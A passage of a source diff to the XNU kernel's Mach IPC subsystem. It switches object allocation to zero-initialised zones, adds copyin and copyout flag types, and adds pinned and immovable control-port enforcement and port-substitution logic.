io_alloc(otype, Z_WAITOK | Z_ZERO); if (object == IO_NULL) { return KERN_RESOURCE_SHORTAGE; } - if (otype == IOT_PORT) { - ipc_port_t port = ip_object_to_port(object); - - bzero((char *)port, sizeof(*port)); - } else if (otype == IOT_PORT_SET) { - ipc_pset_t pset = ips_object_to_pset(object); - - bzero((char *)pset, sizeof(*pset)); - } - io_lock_init(object); *namep = 
CAST_MACH_PORT_TO_NAME(object); kr = ipc_entry_alloc(space, namep, &entry); @@ -451,21 +442,11 @@ ipc_object_alloc_name( assert(type != MACH_PORT_TYPE_NONE); assert(urefs <= MACH_PORT_UREFS_MAX); - object = io_alloc(otype); + object = io_alloc(otype, Z_WAITOK | Z_ZERO); if (object == IO_NULL) { return KERN_RESOURCE_SHORTAGE; } - if (otype == IOT_PORT) { - ipc_port_t port = ip_object_to_port(object); - - bzero((char *)port, sizeof(*port)); - } else if (otype == IOT_PORT_SET) { - ipc_pset_t pset = ips_object_to_pset(object); - - bzero((char *)pset, sizeof(*pset)); - } - io_lock_init(object); kr = ipc_entry_alloc_name(space, name, &entry); if (kr != KERN_SUCCESS) { @@ -474,7 +455,8 @@ ipc_object_alloc_name( } /* space is write-locked */ - if (ipc_right_inuse(space, name, entry)) { + if (ipc_right_inuse(entry)) { + is_write_unlock(space); io_free(otype, object); return KERN_NAME_EXISTS; } @@ -562,13 +544,13 @@ ipc_object_copyin_type( kern_return_t ipc_object_copyin( - ipc_space_t space, - mach_port_name_t name, - mach_msg_type_name_t msgt_name, - ipc_object_t *objectp, - mach_port_context_t context, - mach_msg_guard_flags_t *guard_flags, - ipc_kmsg_flags_t kmsg_flags) + ipc_space_t space, + mach_port_name_t name, + mach_msg_type_name_t msgt_name, + ipc_object_t *objectp, + mach_port_context_t context, + mach_msg_guard_flags_t *guard_flags, + ipc_object_copyin_flags_t copyin_flags) { ipc_entry_t entry; ipc_port_t soright; @@ -576,11 +558,9 @@ ipc_object_copyin( kern_return_t kr; int assertcnt = 0; - ipc_right_copyin_flags_t irc_flags = IPC_RIGHT_COPYIN_FLAGS_DEADOK; - if (kmsg_flags & IPC_KMSG_FLAGS_ALLOW_IMMOVABLE_SEND) { - irc_flags |= IPC_RIGHT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND; - } - + ipc_object_copyin_flags_t irc_flags = IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND | + IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND; + irc_flags = (copyin_flags & irc_flags) | IPC_OBJECT_COPYIN_FLAGS_DEADOK; /* * Could first try a read lock when doing * MACH_MSG_TYPE_COPY_SEND, 
MACH_MSG_TYPE_MAKE_SEND, @@ -685,8 +665,8 @@ ipc_object_copyin_from_kernel( ip_lock(port); if (ip_active(port)) { assert(port->ip_srights > 0); - port->ip_srights++; } + port->ip_srights++; ip_reference(port); ip_unlock(port); break; @@ -908,7 +888,7 @@ ipc_object_insert_send_right( * Routine: ipc_object_copyout * Purpose: * Copyout a capability, placing it into a space. - * If successful, consumes a ref for the object. + * Always consumes a ref for the object. * Conditions: * Nothing locked. * Returns: @@ -926,12 +906,14 @@ ipc_object_copyout( ipc_space_t space, ipc_object_t object, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, mach_port_name_t *namep) { struct knote *kn = current_thread()->ith_knote; mach_port_name_t name; + ipc_port_t port = ip_object_to_port(object); ipc_entry_t entry; kern_return_t kr; @@ -939,73 +921,98 @@ ipc_object_copyout( assert(io_otype(object) == IOT_PORT); if (ITH_KNOTE_VALID(kn, msgt_name)) { - filt_machport_turnstile_prepare_lazily(kn, - msgt_name, ip_object_to_port(object)); + filt_machport_turnstile_prepare_lazily(kn, msgt_name, port); } is_write_lock(space); for (;;) { + ipc_port_t port_subst = IP_NULL; + if (!is_active(space)) { is_write_unlock(space); - return KERN_INVALID_TASK; - } - - if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) && - ipc_right_reverse(space, object, &name, &entry)) { - /* object is locked and active */ - - assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); - break; + kr = KERN_INVALID_TASK; + goto out; } - - name = CAST_MACH_PORT_TO_NAME(object); - kr = ipc_entry_get(space, &name, &entry); + kr = ipc_entries_hold(space, 1); if (kr != KERN_SUCCESS) { /* unlocks/locks space, so must start again */ kr = ipc_entry_grow_table(space, ITS_SIZE_NONE); if (kr != KERN_SUCCESS) { - return kr; /* space is unlocked */ + /* space is unlocked */ + goto out; } continue; } - assert(IE_BITS_TYPE(entry->ie_bits) == 
MACH_PORT_TYPE_NONE); - assert(entry->ie_object == IO_NULL); - io_lock(object); if (!io_active(object)) { io_unlock(object); - ipc_entry_dealloc(space, name, entry); is_write_unlock(space); - return KERN_INVALID_CAPABILITY; + kr = KERN_INVALID_CAPABILITY; + goto out; } /* Don't actually copyout rights we aren't allowed to */ - if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) { + if (!ip_label_check(space, port, msgt_name, &flags, &port_subst)) { io_unlock(object); - ipc_entry_dealloc(space, name, entry); is_write_unlock(space); - return KERN_INVALID_CAPABILITY; + assert(port_subst == IP_NULL); + kr = KERN_INVALID_CAPABILITY; + goto out; + } + + /* is the kolabel requesting a substitution */ + if (port_subst != IP_NULL) { + /* + * port is unlocked, its right consumed + * space is unlocked + */ + assert(msgt_name == MACH_MSG_TYPE_PORT_SEND); + port = port_subst; + if (!IP_VALID(port)) { + object = IO_DEAD; + kr = KERN_INVALID_CAPABILITY; + goto out; + } + + object = ip_to_object(port); + is_write_lock(space); + continue; } - entry->ie_object = object; break; } /* space is write-locked and active, object is locked and active */ + if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) && + ipc_right_reverse(space, object, &name, &entry)) { + assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); + } else { + ipc_entry_claim(space, &name, &entry); + + assert(!ipc_right_inuse(entry)); + assert(entry->ie_object == IO_NULL); + + entry->ie_object = object; + } + kr = ipc_right_copyout(space, name, entry, - msgt_name, context, guard_flags, object); + msgt_name, flags, context, guard_flags, object); /* object is unlocked */ is_write_unlock(space); +out: if (kr == KERN_SUCCESS) { *namep = name; + } else if (IO_VALID(object)) { + ipc_object_destroy(object, msgt_name); } + return kr; } @@ -1035,6 +1042,7 @@ ipc_object_copyout_name( mach_msg_type_name_t msgt_name, mach_port_name_t name) { + ipc_port_t port = ip_object_to_port(object); mach_port_name_t oname; ipc_entry_t 
oentry; ipc_entry_t entry; @@ -1054,52 +1062,48 @@ ipc_object_copyout_name( } /* space is write-locked and active */ + io_lock(object); + + /* + * Don't actually copyout rights we aren't allowed to + * + * In particular, kolabel-ed objects do not allow callers + * to pick the name they end up with. + */ + if (!io_active(object) || ip_is_kolabeled(port)) { + io_unlock(object); + if (!ipc_right_inuse(entry)) { + ipc_entry_dealloc(space, name, entry); + } + is_write_unlock(space); + return KERN_INVALID_CAPABILITY; + } + + /* space is write-locked and active, object is locked and active */ + if ((msgt_name != MACH_MSG_TYPE_PORT_SEND_ONCE) && ipc_right_reverse(space, object, &oname, &oentry)) { - /* object is locked and active */ - if (name != oname) { io_unlock(object); - - if (IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE) { + if (!ipc_right_inuse(entry)) { ipc_entry_dealloc(space, name, entry); } - is_write_unlock(space); return KERN_RIGHT_EXISTS; } assert(entry == oentry); assert(entry->ie_bits & MACH_PORT_TYPE_SEND_RECEIVE); + } else if (ipc_right_inuse(entry)) { + io_unlock(object); + is_write_unlock(space); + return KERN_NAME_EXISTS; } else { - if (ipc_right_inuse(space, name, entry)) { - return KERN_NAME_EXISTS; - } - - assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_NONE); assert(entry->ie_object == IO_NULL); - io_lock(object); - if (!io_active(object)) { - io_unlock(object); - ipc_entry_dealloc(space, name, entry); - is_write_unlock(space); - return KERN_INVALID_CAPABILITY; - } - - /* Don't actually copyout rights we aren't allowed to */ - if (!ip_label_check(space, ip_object_to_port(object), msgt_name)) { - io_unlock(object); - ipc_entry_dealloc(space, name, entry); - is_write_unlock(space); - return KERN_INVALID_CAPABILITY; - } - entry->ie_object = object; } - /* space is write-locked and active, object is locked and active */ - #if IMPORTANCE_INHERITANCE /* * We are slamming a receive right into the space, without @@ -1108,8 +1112,6 @@ 
ipc_object_copyout_name( * port has assertions (and the task wants them). */ if (msgt_name == MACH_MSG_TYPE_PORT_RECEIVE) { - ipc_port_t port = ip_object_to_port(object); - if (space->is_task != TASK_NULL) { task_imp = space->is_task->task_imp_base; if (ipc_importance_task_is_any_receiver_type(task_imp)) { @@ -1128,7 +1130,7 @@ ipc_object_copyout_name( #endif /* IMPORTANCE_INHERITANCE */ kr = ipc_right_copyout(space, name, entry, - msgt_name, NULL, NULL, object); + msgt_name, IPC_OBJECT_COPYOUT_FLAGS_NONE, NULL, NULL, object); /* object is unlocked */ is_write_unlock(space); diff --git a/osfmk/ipc/ipc_object.h b/osfmk/ipc/ipc_object.h index 83021dd24..d67867f32 100644 --- a/osfmk/ipc/ipc_object.h +++ b/osfmk/ipc/ipc_object.h @@ -85,6 +85,20 @@ typedef natural_t ipc_object_refs_t; /* for ipc/ipc_object.h */ typedef natural_t ipc_object_bits_t; typedef natural_t ipc_object_type_t; +__options_closed_decl(ipc_object_copyout_flags_t, uint32_t, { + IPC_OBJECT_COPYOUT_FLAGS_NONE = 0x0, + IPC_OBJECT_COPYOUT_FLAGS_PINNED = 0x1, + IPC_OBJECT_COPYOUT_FLAGS_NO_LABEL_CHECK = 0x2, +}); + +__options_closed_decl(ipc_object_copyin_flags_t, uint32_t, { + IPC_OBJECT_COPYIN_FLAGS_NONE = 0x0, + IPC_OBJECT_COPYIN_FLAGS_ALLOW_IMMOVABLE_SEND = 0x1, /* Dest port contains an immovable send right */ + IPC_OBJECT_COPYIN_FLAGS_SOFT_FAIL_IMMOVABLE_SEND = 0x2, /* Silently fail copyin without guard exception */ + IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE = 0x4, + IPC_OBJECT_COPYIN_FLAGS_DEADOK = 0x8, +}); + /* * The ipc_object is used to both tag and reference count these two data * structures, and (Noto Bene!) 
pointers to either of these or the @@ -156,8 +170,11 @@ struct ipc_object_header { extern zone_t ipc_object_zones[IOT_NUMBER]; extern lck_grp_t ipc_lck_grp; -#define io_alloc(otype) \ - ((ipc_object_t) zalloc(ipc_object_zones[(otype)])) +static inline ipc_object_t +io_alloc(unsigned int otype, zalloc_flags_t flags) +{ + return zalloc_flags(ipc_object_zones[otype], flags); +} extern void io_free( unsigned int otype, @@ -333,7 +350,7 @@ extern kern_return_t ipc_object_copyin( ipc_object_t *objectp, mach_port_context_t context, mach_msg_guard_flags_t *guard_flags, - uint16_t kmsg_flags); + ipc_object_copyin_flags_t copyin_flags); /* Copyin a naked capability from the kernel */ extern void ipc_object_copyin_from_kernel( @@ -361,6 +378,7 @@ extern kern_return_t ipc_object_copyout( ipc_space_t space, ipc_object_t object, mach_msg_type_name_t msgt_name, + ipc_object_copyout_flags_t flags, mach_port_context_t *context, mach_msg_guard_flags_t *guard_flags, mach_port_name_t *namep); diff --git a/osfmk/ipc/ipc_port.c b/osfmk/ipc/ipc_port.c index 2aa10cceb..2b7c9217c 100644 --- a/osfmk/ipc/ipc_port.c +++ b/osfmk/ipc/ipc_port.c @@ -83,6 +83,7 @@ #include #include #include +#include #include #include #include @@ -641,6 +642,8 @@ ipc_port_clear_receiver( * Purpose: * Initializes a newly-allocated port. * Doesn't touch the ip_object fields. + * + * The memory is expected to be zero initialized (allocated with Z_ZERO). 
*/ void @@ -655,46 +658,23 @@ ipc_port_init( port->ip_receiver = space; port->ip_receiver_name = name; - port->ip_mscount = 0; - port->ip_srights = 0; - port->ip_sorights = 0; if (flags & IPC_PORT_INIT_MAKE_SEND_RIGHT) { port->ip_srights = 1; port->ip_mscount = 1; } - port->ip_nsrequest = IP_NULL; - port->ip_pdrequest = IP_NULL; - port->ip_requests = IPR_NULL; - - port->ip_premsg = IKM_NULL; - port->ip_context = 0; - port->ip_reply_context = 0; - - port->ip_sprequests = 0; - port->ip_spimportant = 0; - port->ip_impdonation = 0; - port->ip_tempowner = 0; - - port->ip_guarded = 0; - port->ip_strict_guard = 0; - port->ip_immovable_receive = 0; - port->ip_no_grant = 0; - port->ip_immovable_send = 0; - port->ip_impcount = 0; - if (flags & IPC_PORT_INIT_FILTER_MESSAGE) { port->ip_object.io_bits |= IP_BIT_FILTER_MSG; } port->ip_tg_block_tracking = (flags & IPC_PORT_INIT_TG_BLOCK_TRACKING) != 0; - port->ip_specialreply = (flags & IPC_PORT_INIT_SPECIAL_REPLY) != 0; - port->ip_sync_link_state = PORT_SYNC_LINK_ANY; - port->ip_sync_bootstrap_checkin = 0; - ipc_special_reply_port_bits_reset(port); + if (flags & IPC_PORT_INIT_SPECIAL_REPLY) { + port->ip_specialreply = true; + port->ip_immovable_receive = true; + } - port->ip_send_turnstile = TURNSTILE_NULL; + port->ip_sync_link_state = PORT_SYNC_LINK_ANY; ipc_mqueue_kind_t kind = IPC_MQUEUE_KIND_NONE; if (flags & IPC_PORT_INIT_MESSAGE_QUEUE) { @@ -1537,7 +1517,7 @@ ipc_port_send_update_inheritor( struct knote *kn; turnstile_update_flags_t inheritor_flags = TURNSTILE_INHERITOR_TURNSTILE; - assert(imq_held(mqueue)); + imq_held(mqueue); if (!ip_active(port)) { /* this port is no longer active, it should not push anywhere */ @@ -2325,6 +2305,42 @@ ipc_port_get_watchport_inheritor( return ipc_port_watchport_elem(port)->twe_task->watchports->tw_thread; } +/* + * Routine: ipc_port_get_receiver_task + * Purpose: + * Returns receiver task pointer and its pid (if any) for port. + * + * Conditions: + * Nothing locked. 
+ */ +pid_t +ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task) +{ + task_t receiver = TASK_NULL; + pid_t pid = -1; + + if (!port) { + goto out; + } + + ip_lock(port); + if (ip_active(port) && + MACH_PORT_VALID(port->ip_receiver_name) && + port->ip_receiver && + port->ip_receiver != ipc_space_kernel && + port->ip_receiver != ipc_space_reply) { + receiver = port->ip_receiver->is_task; + pid = task_pid(receiver); + } + ip_unlock(port); + +out: + if (task) { + *task = (uintptr_t)receiver; + } + return pid; +} + /* * Routine: ipc_port_impcount_delta * Purpose: @@ -2688,10 +2704,11 @@ ipc_port_copy_send( * Nothing locked. */ -mach_port_name_t -ipc_port_copyout_send( +static mach_port_name_t +ipc_port_copyout_send_internal( ipc_port_t sright, - ipc_space_t space) + ipc_space_t space, + ipc_object_copyout_flags_t flags) { mach_port_name_t name; @@ -2699,10 +2716,8 @@ ipc_port_copyout_send( kern_return_t kr; kr = ipc_object_copyout(space, ip_to_object(sright), - MACH_MSG_TYPE_PORT_SEND, NULL, NULL, &name); + MACH_MSG_TYPE_PORT_SEND, flags, NULL, NULL, &name); if (kr != KERN_SUCCESS) { - ipc_port_release_send(sright); - if (kr == KERN_INVALID_CAPABILITY) { name = MACH_PORT_DEAD; } else { @@ -2716,28 +2731,38 @@ ipc_port_copyout_send( return name; } +mach_port_name_t +ipc_port_copyout_send( + ipc_port_t sright, + ipc_space_t space) +{ + return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_NONE); +} + +mach_port_name_t +ipc_port_copyout_send_pinned( + ipc_port_t sright, + ipc_space_t space) +{ + return ipc_port_copyout_send_internal(sright, space, IPC_OBJECT_COPYOUT_FLAGS_PINNED); +} + /* - * Routine: ipc_port_release_send + * Routine: ipc_port_release_send_and_unlock * Purpose: * Release a naked send right. * Consumes a ref for the port. * Conditions: - * Nothing locked. + * Port is valid and locked on entry + * Port is unlocked on exit. 
*/ - void -ipc_port_release_send( +ipc_port_release_send_and_unlock( ipc_port_t port) { ipc_port_t nsrequest = IP_NULL; mach_port_mscount_t mscount; - if (!IP_VALID(port)) { - return; - } - - ip_lock(port); - assert(port->ip_srights > 0); if (port->ip_srights == 0) { panic("Over-release of port %p send right!", port); @@ -2765,6 +2790,25 @@ ipc_port_release_send( } } +/* + * Routine: ipc_port_release_send + * Purpose: + * Release a naked send right. + * Consumes a ref for the port. + * Conditions: + * Nothing locked. + */ + +void +ipc_port_release_send( + ipc_port_t port) +{ + if (IP_VALID(port)) { + ip_lock(port); + ipc_port_release_send_and_unlock(port); + } +} + /* * Routine: ipc_port_make_sonce_locked * Purpose: @@ -2895,17 +2939,16 @@ ipc_port_alloc_special( { ipc_port_t port; - port = ip_object_to_port(io_alloc(IOT_PORT)); + port = ip_object_to_port(io_alloc(IOT_PORT, Z_WAITOK | Z_ZERO)); if (port == IP_NULL) { return IP_NULL; } -#if MACH_ASSERT +#if MACH_ASSERT uintptr_t buf[IP_CALLSTACK_MAX]; ipc_port_callstack_init_debug(&buf[0], IP_CALLSTACK_MAX); #endif /* MACH_ASSERT */ - bzero((char *)port, sizeof(*port)); io_lock_init(ip_to_object(port)); port->ip_references = 1; port->ip_object.io_bits = io_makebits(TRUE, IOT_PORT, 0); diff --git a/osfmk/ipc/ipc_port.h b/osfmk/ipc/ipc_port.h index 2784c3c73..5dfcabe5f 100644 --- a/osfmk/ipc/ipc_port.h +++ b/osfmk/ipc/ipc_port.h @@ -141,8 +141,9 @@ struct ipc_port { struct ipc_port *ip_pdrequest; struct ipc_port_request *ip_requests; union { - struct ipc_kmsg *premsg; + struct ipc_kmsg *XNU_PTRAUTH_SIGNED_PTR("ipc_port.premsg") premsg; struct turnstile *send_turnstile; + ipc_port_t XNU_PTRAUTH_SIGNED_PTR("ipc_port.alt_port") alt_port; } kdata2; mach_vm_address_t ip_context; @@ -160,7 +161,8 @@ struct ipc_port { ip_no_grant:1, /* Port wont accept complex messages containing (ool) port descriptors */ ip_immovable_send:1, /* No send(once) rights to this port can be moved out of a space */ ip_tg_block_tracking:1, /* Track 
blocking relationship between thread groups during sync IPC */ - ip_impcount:17; /* number of importance donations in nested queue */ + ip_pinned: 1, /* Can't deallocate the last send right from a space while the bit is set */ + ip_impcount:16; /* number of importance donations in nested queue */ mach_port_mscount_t ip_mscount; mach_port_rights_t ip_srights; @@ -201,6 +203,7 @@ struct ipc_port { #define ip_premsg kdata2.premsg #define ip_send_turnstile kdata2.send_turnstile +#define ip_alt_port kdata2.alt_port #define port_send_turnstile(port) (IP_PREALLOC(port) ? (port)->ip_premsg->ikm_turnstile : (port)->ip_send_turnstile) @@ -284,10 +287,10 @@ MACRO_END #define ip_kotype(port) io_kotype(ip_to_object(port)) #define ip_is_kobject(port) io_is_kobject(ip_to_object(port)) +#define ip_is_control(port) \ + (ip_is_kobject(port) && (ip_kotype(port) == IKOT_TASK_CONTROL || ip_kotype(port) == IKOT_THREAD_CONTROL)) #define ip_is_kolabeled(port) io_is_kolabeled(ip_to_object(port)) #define ip_get_kobject(port) ipc_kobject_get(port) -#define ip_label_check(space, port, msgt_name) \ - (!ip_is_kolabeled(port) || ipc_kobject_label_check((space), (port), (msgt_name))) #define ip_full_kernel(port) imq_full_kernel(&(port)->ip_messages) #define ip_full(port) imq_full(&(port)->ip_messages) @@ -678,11 +681,17 @@ extern mach_port_name_t ipc_port_copyout_send( ipc_port_t sright, ipc_space_t space); +extern mach_port_name_t ipc_port_copyout_send_pinned( + ipc_port_t sright, + ipc_space_t space); + extern void ipc_port_thread_group_blocked( ipc_port_t port); extern void ipc_port_thread_group_unblocked(void); +extern void ipc_port_release_send_and_unlock( + ipc_port_t port); #endif /* MACH_KERNEL_PRIVATE */ #if KERNEL_PRIVATE @@ -717,10 +726,13 @@ extern void ipc_port_release_sonce( extern void ipc_port_release_receive( ipc_port_t port); -/* finalize the destruction of a port before it gets freed */ +/* Finalize the destruction of a port before it gets freed */ extern void 
ipc_port_finalize( ipc_port_t port); +/* Get receiver task and its pid (if any) for port. */ +extern pid_t ipc_port_get_receiver_task(ipc_port_t port, uintptr_t *task); + /* Allocate a port in a special space */ extern ipc_port_t ipc_port_alloc_special( ipc_space_t space, diff --git a/osfmk/ipc/ipc_pset.c b/osfmk/ipc/ipc_pset.c index 7f247520f..3af85d1df 100644 --- a/osfmk/ipc/ipc_pset.c +++ b/osfmk/ipc/ipc_pset.c @@ -176,13 +176,11 @@ ipc_pset_alloc_special( assert(space->is_table == IE_NULL); assert(!is_active(space)); - pset = ips_object_to_pset(io_alloc(IOT_PORT_SET)); + pset = ips_object_to_pset(io_alloc(IOT_PORT_SET, Z_WAITOK | Z_ZERO)); if (pset == IPS_NULL) { return IPS_NULL; } - bzero((char *)pset, sizeof(*pset)); - io_lock_init(ips_to_object(pset)); pset->ips_references = 1; pset->ips_object.io_bits = io_makebits(TRUE, IOT_PORT_SET, 0); @@ -991,7 +989,7 @@ filt_machportevent(struct knote *kn, long hint __assert_only) int result = 0; /* mqueue locked by caller */ - assert(imq_held(mqueue)); + imq_held(mqueue); assert(hint != NOTE_REVOKE); if (imq_is_valid(mqueue)) { assert(!imq_is_set(mqueue)); diff --git a/osfmk/ipc/ipc_right.c b/osfmk/ipc/ipc_right.c index 78fd32c6e..49ce92268 100644 --- a/osfmk/ipc/ipc_right.c +++ b/osfmk/ipc/ipc_right.c @@ -182,13 +182,13 @@ ipc_right_lookup_two_write( * Translate (space, object) -> (name, entry). * Only finds send/receive rights. * Returns TRUE if an entry is found; if so, - * the object is locked and active. + * the object active. * Conditions: * The space must be locked (read or write) and active. - * Nothing else locked. 
+ * The port is locked and active */ -boolean_t +bool ipc_right_reverse( ipc_space_t space, ipc_object_t object, @@ -205,13 +205,9 @@ ipc_right_reverse( assert(io_otype(object) == IOT_PORT); port = ip_object_to_port(object); + require_ip_active(port); - ip_lock(port); - if (!ip_active(port)) { - ip_unlock(port); - - return FALSE; - } + ip_lock_held(port); if (port->ip_receiver == space) { name = port->ip_receiver_name; @@ -225,7 +221,7 @@ ipc_right_reverse( *namep = name; *entryp = entry; - return TRUE; + return true; } if (ipc_hash_lookup(space, ip_to_object(port), namep, entryp)) { @@ -233,11 +229,10 @@ ipc_right_reverse( assert(IE_BITS_TYPE(entry->ie_bits) == MACH_PORT_TYPE_SEND); assert(port == ip_object_to_port(entry->ie_object)); - return TRUE; + return true; } - ip_unlock(port); - return FALSE; + return false; } /* @@ -304,7 +299,7 @@ ipc_right_request_alloc( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { /* port is locked and active */ /* if no new request, just cancel previous */ @@ -468,27 +463,20 @@ ipc_right_request_cancel( * Returns TRUE if it is. * Conditions: * The space is write-locked and active. - * It is unlocked if the entry is inuse. */ -boolean_t +bool ipc_right_inuse( - ipc_space_t space, - __unused mach_port_name_t name, - ipc_entry_t entry) + ipc_entry_t entry) { - if (IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE) { - is_write_unlock(space); - return TRUE; - } - return FALSE; + return IE_BITS_TYPE(entry->ie_bits) != MACH_PORT_TYPE_NONE; } /* * Routine: ipc_right_check * Purpose: * Check if the port has died. If it has, - * and IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not + * and IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE is not * passed and it is not a send once right then * clean up the entry and return TRUE. 
* Conditions: @@ -506,7 +494,7 @@ ipc_right_check( ipc_port_t port, mach_port_name_t name, ipc_entry_t entry, - ipc_right_copyin_flags_t flags) + ipc_object_copyin_flags_t flags) { ipc_entry_bits_t bits; @@ -515,7 +503,7 @@ ipc_right_check( ip_lock(port); if (ip_active(port) || - ((flags & IPC_RIGHT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) && + ((flags & IPC_OBJECT_COPYIN_FLAGS_ALLOW_DEAD_SEND_ONCE) && entry->ie_request == IE_REQ_NONE && (entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE))) { return FALSE; @@ -861,6 +849,7 @@ ipc_right_destroy( * Returns: * KERN_SUCCESS A user ref was released. * KERN_INVALID_RIGHT Entry has wrong type. + * KERN_INVALID_CAPABILITY Deallocating a pinned right. */ kern_return_t @@ -933,7 +922,7 @@ dead_name: port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME); goto dead_name; /* it will release port */ @@ -976,7 +965,7 @@ dead_name: port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { bits = entry->ie_bits; assert(IE_BITS_TYPE(bits) == MACH_PORT_TYPE_DEAD_NAME); goto dead_name; /* it will release port */ @@ -986,6 +975,14 @@ dead_name: assert(port->ip_srights > 0); if (IE_BITS_UREFS(bits) == 1) { + if (pinned_control_port_enabled && port->ip_pinned != 0) { + ip_unlock(port); + is_write_unlock(space); + mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC, + ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ? 
+ kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL); + return KERN_INVALID_CAPABILITY; + } if (--port->ip_srights == 0) { nsrequest = port->ip_nsrequest; if (nsrequest != IP_NULL) { @@ -1087,6 +1084,7 @@ dead_name: * KERN_SUCCESS Count was modified. * KERN_INVALID_RIGHT Entry has wrong type. * KERN_INVALID_VALUE Bad delta for the right. + * KERN_INVALID_CAPABILITY Deallocating a pinned right. */ kern_return_t @@ -1268,7 +1266,7 @@ ipc_right_delta( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { assert(!(entry->ie_bits & MACH_PORT_TYPE_SEND_ONCE)); mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_RIGHT); goto invalid_right; @@ -1318,7 +1316,7 @@ ipc_right_delta( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { /* port is locked and active */ ip_unlock(port); port = IP_NULL; @@ -1408,7 +1406,7 @@ ipc_right_delta( port = ip_object_to_port(entry->ie_object); assert(port != IP_NULL); - if (ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { assert((entry->ie_bits & MACH_PORT_TYPE_SEND) == 0); goto invalid_right; } @@ -1445,6 +1443,11 @@ ipc_right_delta( } if ((urefs + delta) == 0) { + if (pinned_control_port_enabled && port->ip_pinned != 0) { + ip_unlock(port); + goto pinned_right; + } + if (--port->ip_srights == 0) { nsrequest = port->ip_nsrequest; if (nsrequest != IP_NULL) { @@ -1523,6 +1526,15 @@ invalid_right: } return KERN_INVALID_RIGHT; +pinned_right: + assert(pinned_control_port_enabled); + + is_write_unlock(space); + mach_port_guard_exception(name, 0, MPG_FLAGS_MOD_REFS_PINNED_DEALLOC, + 
ipc_control_port_options & IPC_CONTROL_PORT_OPTIONS_PINNED_HARD ? + kGUARD_EXC_MOD_REFS : kGUARD_EXC_MOD_REFS_NON_FATAL); + return KERN_INVALID_CAPABILITY; + invalid_value: is_write_unlock(space); mach_port_guard_exception(name, 0, 0, kGUARD_EXC_INVALID_VALUE); @@ -1772,7 +1784,7 @@ ipc_right_info( * types while we still have it locked. Otherwise, * recapture the (now dead) bits. */ - if (!ipc_right_check(space, port, name, entry, IPC_RIGHT_COPYIN_FLAGS_NONE)) { + if (!ipc_right_check(space, port, name, entry, IPC_OBJECT_COPYIN_FLAGS_NONE)) { if (request != IE_REQ_NONE) { type |= ipc_port_request_type(port, name, request); } @@ -1864,8 +1876,10 @@ ipc_right_copyin_check_reply( * be read without a lock. */ if (reply_port->ip_immovable_send) { - mach_port_guard_exception(reply_name, 0, 0, kGUARD_EXC_IMMOVABLE); - return FALSE; + if (!ip_is_control(reply_port) || immovable_control_port_enabled) { + mach_port_guard_exception_immovable(reply_name, reply_port, MPG_FLAGS_NONE); + return FALSE; + } } if (reply_type == MACH_MSG_TYPE_MOVE_SEND_ONCE) { @@ -1943,7 +1957,8 @@ ipc_right_copyin_check_guard_locked( * Returns: * KERN_SUCCESS Acquired an object, possibly IO_DEAD. * KERN_INVALID_RIGHT Name doesn't denote correct right. - * KERN_INVALID_CAPABILITY Trying to move an kobject port or an immovable right + * KERN_INVALID_CAPABILITY Trying to move an kobject port or an immovable right, + * or moving the last ref of pinned right * KERN_INVALID_ARGUMENT Port is unguarded or guard mismatch */ @@ -1953,7 +1968,7 @@ ipc_right_copyin( mach_port_name_t name, ipc_entry_t entry, mach_msg_type_name_t msgt_name, - ipc_right_copyin_flags_t flags, + ipc_object_copyin_flags_t flags, ipc_object_t *objectp, ipc_port_t *sorightp, ipc_port_t *releasep, @@ -1964,8 +1979,9 @@ ipc_right_copyin( 